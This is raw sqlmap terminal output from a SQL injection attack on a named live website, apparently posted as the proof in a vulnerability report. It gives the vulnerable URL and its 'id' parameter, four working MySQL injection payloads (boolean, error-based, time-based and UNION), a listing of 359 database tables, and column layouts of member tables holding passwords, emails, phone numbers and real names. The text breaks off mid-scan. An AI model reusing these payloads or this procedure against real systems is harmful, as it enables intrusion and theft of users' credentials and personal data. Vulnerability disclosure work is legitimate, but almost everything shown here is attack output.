[23:11:44] [INFO] retrieved: pw_cms_attach
[23:11:44] [INFO] retrieved: pw_cms_column
[23:11:45] [INFO] retrieved: pw_cms_comment
[23:11:45] [INFO] retrieved: pw_cms_commentreply
[23:11:51] [INFO] retrieved: pw_cms_purview
[23:11:56] [INFO] retrieved: pw_cnalbum
[23:11:57] [INFO] retrieved: pw_cnclass
[23:11:57] [INFO] retrieved: pw_cnlevel
[23:11:58] [INFO] retrieved: pw_cnphoto
[23:11:58] [INFO] retrieved: pw_cnskin
[23:11:58] [INFO] retrieved: pw_cnstyles
[23:11:59] [INFO] retrieved: pw_collection
[23:11:59] [INFO] retrieved: pw_collectiontype
[23:12:00] [INFO] retrieved: pw_colonys
[23:12:00] [INFO] retrieved: pw_comment
[23:12:00] [INFO] retrieved: pw_company
[23:12:01] [INFO] retrieved: pw_config
[23:12:01] [INFO] retrieved: pw_creditlog
[23:12:02] [INFO] retrieved: pw_credits
[23:12:02] [INFO] retrieved: pw_customfield
[23:12:02] [INFO] retrieved: pw_cwritedata
[23:12:08] [INFO] retrieved: pw_datanalyse
[23:12:08] [INFO] retrieved: pw_datastate
[23:12:14] [INFO] retrieved: pw_datastore
[23:12:14] [INFO] retrieved: pw_debateclass
[23:12:15] [INFO] retrieved: pw_debatedata
[23:12:15] [INFO] retrieved: pw_debateinfo
[23:12:16] [INFO] retrieved: pw_debatereplys
[23:12:16] [INFO] retrieved: pw_debates
[23:12:16] [INFO] retrieved: pw_debatethreads
[23:12:22] [INFO] retrieved: pw_delta_diarys
[23:12:22] [INFO] retrieved: pw_delta_members
[23:12:23] [INFO] retrieved: pw_delta_posts
[23:12:23] [INFO] retrieved: pw_delta_threads
[23:12:23] [INFO] retrieved: pw_diary
[23:12:29] [INFO] retrieved: pw_diarytype
[23:12:29] [INFO] retrieved: pw_draft
[23:12:29] [INFO] retrieved: pw_elements
[23:12:30] [INFO] retrieved: pw_extragroups
[23:12:30] [INFO] retrieved: pw_favors
[23:12:31] [INFO] retrieved: pw_feed
[23:12:36] [INFO] retrieved: pw_filter
[23:12:37] [INFO] retrieved: pw_filter_class
[23:12:37] [INFO] retrieved: pw_filter_dictionary
[23:12:38] [INFO] retrieved: pw_focus
[23:12:43] [INFO] retrieved: pw_forumdata
[23:12:43] [INFO] retrieved: pw_forumlog
[23:12:44] [INFO] retrieved: pw_forummsg
[23:12:50] [INFO] retrieved: pw_forums
[23:12:50] [INFO] retrieved: pw_forumsell
[23:12:55] [INFO] retrieved: pw_forumsextra
[23:13:01] [INFO] retrieved: pw_forumtype
[23:13:01] [INFO] retrieved: pw_friends
[23:13:07] [INFO] retrieved: pw_friendtype
[23:13:07] [INFO] retrieved: pw_group_replay
[23:13:08] [INFO] retrieved: pw_hack
[23:13:08] [INFO] retrieved: pw_help
[23:13:08] [INFO] retrieved: pw_hits_threads
[23:13:09] [INFO] retrieved: pw_home
[23:13:09] [INFO] retrieved: pw_invitecode
[23:13:10] [INFO] retrieved: pw_inviterecord
[23:13:10] [INFO] retrieved: pw_invoke
[23:13:11] [INFO] retrieved: pw_invokepiece
[23:13:11] [INFO] retrieved: pw_ipstates
[23:13:11] [INFO] retrieved: pw_job
[23:13:12] [INFO] retrieved: pw_jober
[23:13:13] [INFO] retrieved: pw_kmd_info
[23:13:13] [INFO] retrieved: pw_kmd_paylog
[23:13:13] [INFO] retrieved: pw_kmd_spread
[23:13:14] [INFO] retrieved: pw_kmd_user
[23:13:14] [INFO] retrieved: pw_log_aggregate
[23:13:15] [INFO] retrieved: pw_log_attachs
[23:13:15] [INFO] retrieved: pw_log_colonys
[23:13:15] [INFO] retrieved: pw_log_diary
[23:13:16] [INFO] retrieved: pw_log_forums
[23:13:21] [INFO] retrieved: pw_log_members
[23:13:27] [INFO] retrieved: pw_log_postdefend
[23:13:27] [INFO] retrieved: pw_log_posts
[23:13:27] [INFO] retrieved: pw_log_postverify
[23:13:28] [INFO] retrieved: pw_log_setting
[23:13:28] [INFO] retrieved: pw_log_threads
[23:13:29] [INFO] retrieved: pw_log_userdefend
[23:13:29] [INFO] retrieved: pw_log_weibos
[23:13:30] [INFO] retrieved: pw_medal_apply
[23:13:30] [INFO] retrieved: pw_medal_award
[23:13:30] [INFO] retrieved: pw_medal_info
[23:13:31] [INFO] retrieved: pw_medal_log
[23:13:31] [INFO] retrieved: pw_medalinfo
[23:13:31] [INFO] retrieved: pw_medalslogs
[23:13:32] [INFO] retrieved: pw_medaluser
[23:13:32] [INFO] retrieved: pw_member_behavior_statistic
[23:13:33] [INFO] retrieved: pw_membercredit
[23:13:33] [INFO] retrieved: pw_memberdata
[23:13:34] [INFO] retrieved: pw_memberinfo
[23:13:34] [INFO] retrieved: pw_members
[23:13:35] [INFO] retrieved: pw_members0705
[23:13:40] [INFO] retrieved: pw_members123
[23:13:41] [INFO] retrieved: pw_membersnew
[23:13:41] [INFO] retrieved: pw_membertags
[23:13:41] [INFO] retrieved: pw_membertags_relations
[23:13:42] [INFO] retrieved: pw_memo
[23:13:42] [INFO] retrieved: pw_merge_posts
[23:13:43] [INFO] retrieved: pw_merge_tmsgs
[23:13:49] [INFO] retrieved: pw_modehot
[23:13:49] [INFO] retrieved: pw_modules
[23:13:49] [INFO] retrieved: pw_mpageconfig
[23:13:50] [INFO] retrieved: pw_ms_attachs
[23:13:50] [INFO] retrieved: pw_ms_configs
[23:13:51] [INFO] retrieved: pw_ms_messages
[23:13:51] [INFO] retrieved: pw_ms_relations
[23:13:52] [INFO] retrieved: pw_ms_replies
[23:13:53] [INFO] retrieved: pw_ms_searchs
[23:13:54] [INFO] retrieved: pw_ms_tasks
[23:13:54] [INFO] retrieved: pw_msg
[23:13:54] [INFO] retrieved: pw_msgc
[23:13:55] [INFO] retrieved: pw_msglog
[23:13:55] [INFO] retrieved: pw_nav
[23:13:56] [INFO] retrieved: pw_oboard
[23:13:56] [INFO] retrieved: pw_online
[23:13:56] [INFO] retrieved: pw_online_guest
[23:13:57] [INFO] retrieved: pw_online_statistics
[23:13:57] [INFO] retrieved: pw_online_user
[23:13:58] [INFO] retrieved: pw_ouserdata
[23:13:58] [INFO] retrieved: pw_overprint
[23:13:58] [INFO] retrieved: pw_owritedata
[23:13:59] [INFO] retrieved: pw_pagecache
[23:13:59] [INFO] retrieved: pw_pageinvoke
[23:14:00] [INFO] retrieved: pw_pcfield
[23:14:00] [INFO] retrieved: pw_pcmember
[23:14:01] [INFO] retrieved: pw_pcvalue1
[23:14:01] [INFO] retrieved: pw_permission
[23:14:01] [INFO] retrieved: pw_pidtmp
[23:14:07] [INFO] retrieved: pw_pinglog
[23:14:07] [INFO] retrieved: pw_plan
[23:14:08] [INFO] retrieved: pw_polls
[23:14:08] [INFO] retrieved: pw_portalpage
[23:14:09] [INFO] retrieved: pw_postcate
[23:14:09] [INFO] retrieved: pw_posts
[23:14:09] [INFO] retrieved: pw_postsfloor
[23:14:10] [INFO] retrieved: pw_poststopped
[23:14:10] [INFO] retrieved: pw_privacy
[23:14:11] [INFO] retrieved: pw_proclock
[23:14:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:14:22] [INFO] retrieved: pw_pushdata
[23:14:22] [INFO] retrieved: pw_pushpic
[23:14:23] [INFO] retrieved: pw_rate
[23:14:23] [INFO] retrieved: pw_rateconfig
[23:14:23] [INFO] retrieved: pw_rateresult
[23:14:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:14:35] [INFO] retrieved: pw_recycle
[23:14:35] [INFO] retrieved: pw_replyreward
[23:14:36] [INFO] retrieved: pw_replyrewardrecord
[23:14:36] [INFO] retrieved: pw_report
[23:14:37] [INFO] retrieved: pw_reward
[23:14:46] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:14:48] [INFO] retrieved: pw_robbuild
[23:14:48] [INFO] retrieved: pw_robbuildfloor
[23:14:49] [INFO] retrieved: pw_schcache
[23:14:49] [INFO] retrieved: pw_school
[23:14:49] [INFO] retrieved: pw_searchadvert
[23:14:50] [INFO] retrieved: pw_searchforum
[23:14:51] [INFO] retrieved: pw_searchfourm
[23:14:51] [INFO] retrieved: pw_searchhotwords
[23:14:52] [INFO] retrieved: pw_searchstatistic
[23:14:52] [INFO] retrieved: pw_setform
[23:14:53] [INFO] retrieved: pw_sharelinks
[23:14:53] [INFO] retrieved: pw_sharelinksrelation
[23:14:53] [INFO] retrieved: pw_sharelinkstype
[23:14:54] [INFO] retrieved: pw_singleright
[23:14:54] [INFO] retrieved: pw_smiles
[23:14:55] [INFO] retrieved: pw_space
[23:14:55] [INFO] retrieved: pw_sqlcv
[23:14:55] [INFO] retrieved: pw_stamp
[23:14:56] [INFO] retrieved: pw_statistics_daily
[23:14:56] [INFO] retrieved: pw_stopic
[23:14:57] [INFO] retrieved: pw_stopic_comment
[23:14:57] [INFO] retrieved: pw_stopic_commentreply
[23:14:58] [INFO] retrieved: pw_stopicblock
[23:14:58] [INFO] retrieved: pw_stopiccategory
[23:14:59] [INFO] retrieved: pw_stopicpictures
[23:14:59] [INFO] retrieved: pw_stopicunit
[23:14:59] [INFO] retrieved: pw_styles
[23:15:00] [INFO] retrieved: pw_tagdata
[23:15:00] [INFO] retrieved: pw_tags
[23:15:01] [INFO] retrieved: pw_task
[23:15:01] [INFO] retrieved: pw_temp_keywords
[23:15:01] [INFO] retrieved: pw_threads
[23:15:02] [INFO] retrieved: pw_threads_at
[23:15:02] [INFO] retrieved: pw_threads_img
[23:15:03] [INFO] retrieved: pw_tmsgs
[23:15:03] [INFO] retrieved: pw_toollog
[23:15:04] [INFO] retrieved: pw_tools
[23:15:04] [INFO] retrieved: pw_topiccate
[23:15:04] [INFO] retrieved: pw_topicfield
[23:15:05] [INFO] retrieved: pw_topicmodel
[23:15:10] [INFO] retrieved: pw_topictype
[23:15:10] [INFO] retrieved: pw_topicvalue1
[23:15:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:15:22] [INFO] retrieved: pw_topicvalue2
[23:15:27] [INFO] retrieved: pw_topicvalue3
[23:15:28] [INFO] retrieved: pw_topicvalue4
[23:15:28] [INFO] retrieved: pw_topicvalue5
[23:15:28] [INFO] retrieved: pw_topicvalue6
[23:15:29] [INFO] retrieved: pw_topicvalue7
[23:15:29] [INFO] retrieved: pw_topicvalue8
[23:15:30] [INFO] retrieved: pw_tpl
[23:15:30] [INFO] retrieved: pw_tpltype
[23:15:30] [INFO] retrieved: pw_trade
[23:15:31] [INFO] retrieved: pw_tradeorder
[23:15:31] [INFO] retrieved: pw_ucapp
[23:15:32] [INFO] retrieved: pw_ucnotify
[23:15:32] [INFO] retrieved: pw_ucsyncredit
[23:15:33] [INFO] retrieved: pw_user_career
[23:15:33] [INFO] retrieved: pw_user_education
[23:15:34] [INFO] retrieved: pw_userapp
[23:15:34] [INFO] retrieved: pw_userbinding
[23:15:34] [INFO] retrieved: pw_usercache
[23:15:35] [INFO] retrieved: pw_usergroups
[23:15:35] [INFO] retrieved: pw_usertool
[23:15:36] [INFO] retrieved: pw_voter
[23:15:36] [INFO] retrieved: pw_wappush
[23:15:36] [INFO] retrieved: pw_wappushtype
[23:15:37] [INFO] retrieved: pw_weibo_bind
[23:15:46] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:15:48] [INFO] retrieved: pw_weibo_cmrelations
[23:15:48] [INFO] retrieved: pw_weibo_cnrelations
[23:15:49] [INFO] retrieved: pw_weibo_comment
[23:15:49] [INFO] retrieved: pw_weibo_content
[23:15:49] [INFO] retrieved: pw_weibo_login_session
[23:15:50] [INFO] retrieved: pw_weibo_login_user
[23:15:50] [INFO] retrieved: pw_weibo_referto
[23:15:51] [INFO] retrieved: pw_weibo_relations
[23:15:51] [INFO] retrieved: pw_weibo_topicattention
[23:15:52] [INFO] retrieved: pw_weibo_topicrelations
[23:15:52] [INFO] retrieved: pw_weibo_topics
[23:15:52] [INFO] retrieved: pw_windcode
[23:15:58] [INFO] retrieved: pw_wordfb
[23:16:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:16:09] [INFO] retrieved: pw_write_smiles
[23:16:09] [INFO] retrieved: pw_yun_setting
[23:16:10] [INFO] retrieved: topic
[23:16:10] [INFO] retrieved: trip
[23:16:15] [INFO] retrieved: user
[23:16:16] [INFO] retrieved: user_bak
[23:16:16] [INFO] retrieved: userfun
[23:16:17] [INFO] retrieved: usergroup
[23:16:17] [INFO] retrieved: wqw_city
[23:16:18] [INFO] retrieved: wqw_prov
[23:16:18] [INFO] retrieved: xly_user
[23:16:18] [INFO] retrieved: xunlianying
Database: paladinclub
[359 tables]
+------------------------------+
| language |
| user |
| a_customers |
| a_floor |
| a_user |
| article |
| carinfo |
| category |
| cj_jl |
| clubblock |
| clubinfo |
| czhd_memberinfo |
| dakar |
| dakar2006 |
| dakar20061 |
| dakar20062 |
| dakar20063 |
| dakar_config |
| east2008_answer |
| east2008_loginrecord |
| east2008_question |
| east2008_user |
| east2008pho_loginrecord |
| east2008pho_photo |
| east2008pho_toupiao |
| east2008pho_user |
| eastgames_notify |
| fankui |
| file_flow |
| file_flow_060817_bak |
| file_info |
| file_info_060817_bak |
| file_save |
| file_share |
| file_share_060817_bak |
| hk_article |
| hk_class |
| huikan |
| imagefile |
| imgcategory |
| khly_hz |
| linesname |
| lmsj |
| media |
| memberawoke |
| memberinfo |
| memberinfo1 |
| memberinfo_bak |
| memberinfo_t |
| membermark |
| membermodify |
| memberpay |
| oneq_mission |
| oneq_missiondata |
| online |
| paladin_awards |
| prov |
| pw_actattachs |
| pw_actions |
| pw_active |
| pw_activity |
| pw_activitycate |
| pw_activitydefaultvalue |
| pw_activityfield |
| pw_activitymembers |
| pw_activitymodel |
| pw_activitypaylog |
| pw_activityvalue1 |
| pw_activityvalue10 |
| pw_activityvalue11 |
| pw_activityvalue12 |
| pw_activityvalue13 |
| pw_activityvalue14 |
| pw_activityvalue15 |
| pw_activityvalue16 |
| pw_activityvalue17 |
| pw_activityvalue18 |
| pw_activityvalue2 |
| pw_activityvalue3 |
| pw_activityvalue4 |
| pw_activityvalue5 |
| pw_activityvalue6 |
| pw_activityvalue7 |
| pw_activityvalue8 |
| pw_activityvalue9 |
| pw_actmember |
| pw_actmembers |
| pw_administrators |
| pw_adminlog |
| pw_adminset |
| pw_advert |
| pw_announce |
| pw_area_level |
| pw_areas |
| pw_argument |
| pw_attachbuy |
| pw_attachdownload |
| pw_attachs |
| pw_attention |
| pw_attention_blacklist |
| pw_auth_certificate |
| pw_ban |
| pw_banuser |
| pw_bbsinfo |
| pw_block |
| pw_buyadvert |
| pw_cache |
| pw_cache_distribute |
| pw_cache_members |
| pw_cachedata |
| pw_channel |
| pw_clientorder |
| pw_cmembers |
| pw_cms_article |
| pw_cms_articlecontent |
| pw_cms_articleextend |
| pw_cms_attach |
| pw_cms_column |
| pw_cms_comment |
| pw_cms_commentreply |
| pw_cms_purview |
| pw_cnalbum |
| pw_cnclass |
| pw_cnlevel |
| pw_cnphoto |
| pw_cnskin |
| pw_cnstyles |
| pw_collection |
| pw_collectiontype |
| pw_colonys |
| pw_comment |
| pw_company |
| pw_config |
| pw_creditlog |
| pw_credits |
| pw_customfield |
| pw_cwritedata |
| pw_datanalyse |
| pw_datastate |
| pw_datastore |
| pw_debateclass |
| pw_debatedata |
| pw_debateinfo |
| pw_debatereplys |
| pw_debates |
| pw_debatethreads |
| pw_delta_diarys |
| pw_delta_members |
| pw_delta_posts |
| pw_delta_threads |
| pw_diary |
| pw_diarytype |
| pw_draft |
| pw_elements |
| pw_extragroups |
| pw_favors |
| pw_feed |
| pw_filter |
| pw_filter_class |
| pw_filter_dictionary |
| pw_focus |
| pw_forumdata |
| pw_forumlog |
| pw_forummsg |
| pw_forums |
| pw_forumsell |
| pw_forumsextra |
| pw_forumtype |
| pw_friends |
| pw_friendtype |
| pw_group_replay |
| pw_hack |
| pw_help |
| pw_hits_threads |
| pw_home |
| pw_invitecode |
| pw_inviterecord |
| pw_invoke |
| pw_invokepiece |
| pw_ipstates |
| pw_job |
| pw_jober |
| pw_kmd_info |
| pw_kmd_paylog |
| pw_kmd_spread |
| pw_kmd_user |
| pw_log_aggregate |
| pw_log_attachs |
| pw_log_colonys |
| pw_log_diary |
| pw_log_forums |
| pw_log_members |
| pw_log_postdefend |
| pw_log_posts |
| pw_log_postverify |
| pw_log_setting |
| pw_log_threads |
| pw_log_userdefend |
| pw_log_weibos |
| pw_medal_apply |
| pw_medal_award |
| pw_medal_info |
| pw_medal_log |
| pw_medalinfo |
| pw_medalslogs |
| pw_medaluser |
| pw_member_behavior_statistic |
| pw_membercredit |
| pw_memberdata |
| pw_memberinfo |
| pw_members |
| pw_members0705 |
| pw_members123 |
| pw_membersnew |
| pw_membertags |
| pw_membertags_relations |
| pw_memo |
| pw_merge_posts |
| pw_merge_tmsgs |
| pw_modehot |
| pw_modules |
| pw_mpageconfig |
| pw_ms_attachs |
| pw_ms_configs |
| pw_ms_messages |
| pw_ms_relations |
| pw_ms_replies |
| pw_ms_searchs |
| pw_ms_tasks |
| pw_msg |
| pw_msgc |
| pw_msglog |
| pw_nav |
| pw_oboard |
| pw_online |
| pw_online_guest |
| pw_online_statistics |
| pw_online_user |
| pw_ouserdata |
| pw_overprint |
| pw_owritedata |
| pw_pagecache |
| pw_pageinvoke |
| pw_pcfield |
| pw_pcmember |
| pw_pcvalue1 |
| pw_permission |
| pw_pidtmp |
| pw_pinglog |
| pw_plan |
| pw_polls |
| pw_portalpage |
| pw_postcate |
| pw_posts |
| pw_postsfloor |
| pw_poststopped |
| pw_privacy |
| pw_proclock |
| pw_pushdata |
| pw_pushpic |
| pw_rate |
| pw_rateconfig |
| pw_rateresult |
| pw_recycle |
| pw_replyreward |
| pw_replyrewardrecord |
| pw_report |
| pw_reward |
| pw_robbuild |
| pw_robbuildfloor |
| pw_schcache |
| pw_school |
| pw_searchadvert |
| pw_searchforum |
| pw_searchfourm |
| pw_searchhotwords |
| pw_searchstatistic |
| pw_setform |
| pw_sharelinks |
| pw_sharelinksrelation |
| pw_sharelinkstype |
| pw_singleright |
| pw_smiles |
| pw_space |
| pw_sqlcv |
| pw_stamp |
| pw_statistics_daily |
| pw_stopic |
| pw_stopic_comment |
| pw_stopic_commentreply |
| pw_stopicblock |
| pw_stopiccategory |
| pw_stopicpictures |
| pw_stopicunit |
| pw_styles |
| pw_tagdata |
| pw_tags |
| pw_task |
| pw_temp_keywords |
| pw_threads |
| pw_threads_at |
| pw_threads_img |
| pw_tmsgs |
| pw_toollog |
| pw_tools |
| pw_topiccate |
| pw_topicfield |
| pw_topicmodel |
| pw_topictype |
| pw_topicvalue1 |
| pw_topicvalue2 |
| pw_topicvalue3 |
| pw_topicvalue4 |
| pw_topicvalue5 |
| pw_topicvalue6 |
| pw_topicvalue7 |
| pw_topicvalue8 |
| pw_tpl |
| pw_tpltype |
| pw_trade |
| pw_tradeorder |
| pw_ucapp |
| pw_ucnotify |
| pw_ucsyncredit |
| pw_user_career |
| pw_user_education |
| pw_userapp |
| pw_userbinding |
| pw_usercache |
| pw_usergroups |
| pw_usertool |
| pw_voter |
| pw_wappush |
| pw_wappushtype |
| pw_weibo_bind |
| pw_weibo_cmrelations |
| pw_weibo_cnrelations |
| pw_weibo_comment |
| pw_weibo_content |
| pw_weibo_login_session |
| pw_weibo_login_user |
| pw_weibo_referto |
| pw_weibo_relations |
| pw_weibo_topicattention |
| pw_weibo_topicrelations |
| pw_weibo_topics |
| pw_windcode |
| pw_wordfb |
| pw_write_smiles |
| pw_yun_setting |
| topic |
| trip |
| user_bak |
| userfun |
| usergroup |
| wqw_city |
| wqw_prov |
| xly_user |
| xunlianying |
+------------------------------+
[23:16:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 23:16:18
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --columns -T memberawoke -D paladinclub
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:18:42
[23:18:42] [INFO] resuming back-end DBMS 'mysql'
[23:18:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[23:18:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[23:18:43] [INFO] fetching columns for table 'memberawoke' in database 'paladinclub'
[23:18:44] [INFO] the SQL query used returns 19 entries
[23:18:45] [INFO] retrieved: "id","int(10)"
[23:18:45] [INFO] retrieved: "memberid","int(10)"
[23:18:46] [INFO] retrieved: "message","varchar(125)"
[23:18:46] [INFO] retrieved: "overdate","date"
[23:18:46] [INFO] retrieved: "isread","tinyint(4)"
[23:18:47] [INFO] retrieved: "awoketime","int(2)"
[23:18:56] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:18:58] [INFO] retrieved: "awoketype","varchar(2)"
[23:18:58] [INFO] retrieved: "smsfrom","varchar(25)"
[23:18:58] [INFO] retrieved: "ifsend","varchar(255)"
[23:18:59] [INFO] retrieved: "ifsuccess","varchar(255)"
[23:18:59] [INFO] retrieved: "err","varchar(255)"
[23:19:00] [INFO] retrieved: "errid","varchar(255)"
[23:19:00] [INFO] retrieved: "num","int(11)"
[23:19:01] [INFO] retrieved: "fopen","varchar(255)"
[23:19:01] [INFO] retrieved: "mobilephone","varchar(255)"
[23:19:01] [INFO] retrieved: "memawo_mis_id","int(11)"
[23:19:02] [INFO] retrieved: "memawo_misd_id","int(11)"
[23:19:02] [INFO] retrieved: "memawo_addtime","datetime"
[23:19:03] [INFO] retrieved: "memawo_timestamp","timestamp"
Database: paladinclub
Table: memberawoke
[19 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| awoketime | int(2) |
| awoketype | varchar(2) |
| err | varchar(255) |
| errid | varchar(255) |
| fopen | varchar(255) |
| id | int(10) |
| ifsend | varchar(255) |
| ifsuccess | varchar(255) |
| isread | tinyint(4) |
| memawo_addtime | datetime |
| memawo_mis_id | int(11) |
| memawo_misd_id | int(11) |
| memawo_timestamp | timestamp |
| memberid | int(10) |
| message | varchar(125) |
| mobilephone | varchar(255) |
| num | int(11) |
| overdate | date |
| smsfrom | varchar(25) |
+------------------+--------------+
[23:19:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 23:19:03
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --columns -T pw_members -D paladinclub
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:20:02
[23:20:02] [INFO] resuming back-end DBMS 'mysql'
[23:20:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[23:20:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[23:20:03] [INFO] fetching columns for table 'pw_members' in database 'paladinclub'
[23:20:04] [INFO] the SQL query used returns 41 entries
[23:20:04] [INFO] retrieved: "uid","int(10) unsigned"
[23:20:05] [INFO] retrieved: "username","varchar(50)"
[23:20:05] [INFO] retrieved: "password","varchar(100)"
[23:20:05] [INFO] retrieved: "safecv","varchar(10)"
[23:20:11] [INFO] retrieved: "email","varchar(30)"
[23:20:11] [INFO] retrieved: "groupid","tinyint(3)"
[23:20:12] [INFO] retrieved: "memberid","tinyint(3)"
[23:20:12] [INFO] retrieved: "groups","varchar(128)"
[23:20:13] [INFO] retrieved: "icon","varchar(255)"
[23:20:13] [INFO] retrieved: "gender","tinyint(1)"
[23:20:14] [INFO] retrieved: "regdate","int(10) unsigned"
[23:20:14] [INFO] retrieved: "signature","text"
[23:20:15] [INFO] retrieved: "introduce","text"
[23:20:15] [INFO] retrieved: "oicq","varchar(6)"
[23:20:16] [INFO] retrieved: "aliww","varchar(30)"
[23:20:16] [INFO] retrieved: "icq","varchar(6)"
[23:20:16] [INFO] retrieved: "msn","varchar(18)"
[23:20:17] [INFO] retrieved: "yahoo","varchar(18)"
[23:20:17] [INFO] retrieved: "site","varchar(38)"
[23:20:18] [INFO] retrieved: "location","varchar(18)"
[23:20:18] [INFO] retrieved: "honor","varchar(15)"
[23:20:18] [INFO] retrieved: "bday","date"
[23:20:19] [INFO] retrieved: "lastaddrst","varchar(255)"
[23:20:19] [INFO] retrieved: "yz","int(10)"
[23:20:19] [INFO] retrieved: "timedf","varchar(3)"
[23:20:20] [INFO] retrieved: "style","varchar(6)"
[23:20:20] [INFO] retrieved: "datefm","varchar(8)"
[23:20:21] [INFO] retrieved: "t_num","tinyint(3) unsigned"
[23:20:21] [INFO] retrieved: "p_num","tinyint(3) unsigned"
[23:20:21] [INFO] retrieved: "attach","varchar(50)"
[23:20:22] [INFO] retrieved: "hack","varchar(128)"
[23:20:22] [INFO] retrieved: "newpm","smallint(6) unsigned"
[23:20:23] [INFO] retrieved: "banpm","text"
[23:20:23] [INFO] retrieved: "msggroups","varchar(128)"
[23:20:24] [INFO] retrieved: "medals","varchar(128)"
[23:20:24] [INFO] retrieved: "userstatus","int(10) unsigned"
[23:20:25] [INFO] retrieved: "shortcut","varchar(255)"
[23:20:25] [INFO] retrieved: "authmobile","char(16)"
[23:20:25] [INFO] retrieved: "realname","varchar(16)"
[23:20:26] [INFO] retrieved: "apartment","int(10) unsigned"
[23:20:26] [INFO] retrieved: "home","int(10) unsigned"
Database: paladinclub
Table: pw_members
[41 columns]
+------------+----------------------+
| Column | Type |
+------------+----------------------+
| aliww | varchar(30) |
| apartment | int(10) unsigned |
| attach | varchar(50) |
| authmobile | char(16) |
| banpm | text |
| bday | date |
| datefm | varchar(8) |
| email | varchar(30) |
| gender | tinyint(1) |
| groupid | tinyint(3) |
| groups | varchar(128) |
| hack | varchar(128) |
| home | int(10) unsigned |
| honor | varchar(15) |
| icon | varchar(255) |
| icq | varchar(6) |
| introduce | text |
| lastaddrst | varchar(255) |
| location | varchar(18) |
| medals | varchar(128) |
| memberid | tinyint(3) |
| msggroups | varchar(128) |
| msn | varchar(18) |
| newpm | smallint(6) unsigned |
| oicq | varchar(6) |
| p_num | tinyint(3) unsigned |
| password | varchar(100) |
| realname | varchar(16) |

漏洞证明:

<code><code>root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:40:52
[22:40:52] [INFO] testing connection to the target URL
[22:40:55] [INFO] testing if the target URL is stable
[22:41:01] [INFO] target URL is stable
[22:41:01] [INFO] testing if GET parameter 'id' is dynamic
[22:41:06] [WARNING] GET parameter 'id' does not appear dynamic
[22:41:08] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[22:41:08] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[22:41:08] [INFO] testing for SQL injection on GET parameter 'id'
